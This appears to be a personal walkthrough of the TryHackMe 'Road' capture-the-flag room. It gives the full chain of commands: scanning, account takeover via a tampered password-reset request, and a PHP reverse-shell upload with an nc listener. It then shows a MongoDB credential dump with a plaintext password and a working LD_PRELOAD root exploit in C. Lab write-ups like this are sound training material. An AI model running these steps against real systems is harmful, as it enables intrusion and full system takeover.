Road

Room Link: https://tryhackme.com/room/road

Initial Scan

Kali

nmap -A $VICTIM

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

Kali

gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

I go to the /v2/ directory and it forwards me a login, I then create a user.

Under profile it tells us the admin email. admin@sky.thm

There is a page that allows us to update our password, I try with my account with burp running to intercept.

I change my email to admin and it seems to work

I can login as admin

Under profile there is a page that accepts uploads for profile pictures but there doesn't seem to be any filtering

Kali

curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -o shell.php

Just changed the IP part.

From the source we can see a place where the images are uploaded to

Kali

nc -lvnp 1234

directory listing is disabled but we know the name of the file, it doesn't change the name

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

ss -ltp

Victim

mongo

Victim(mongo)

show dbs
use backup
show collections
db.user.find();
exit

Victim

su webdeveloper
Password: BahamasChapp123!@#

Victim(webdeveloper)

sudo -l

Victim(webdeveloper)

cd /home/webdeveloper/
vi preload.c

preload.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
 unsetenv("LD_PRELOAD");
 setgid(0);
 setuid(0);
 system("/bin/bash");
}

Victim(webdeveloper)

gcc -fPIC -shared -o preload.so preload.c -nostartfiles
sudo LD_PRELOAD=/home/webdeveloper/preload.so /usr/bin/sky_backup_utility

Last updated 1 year ago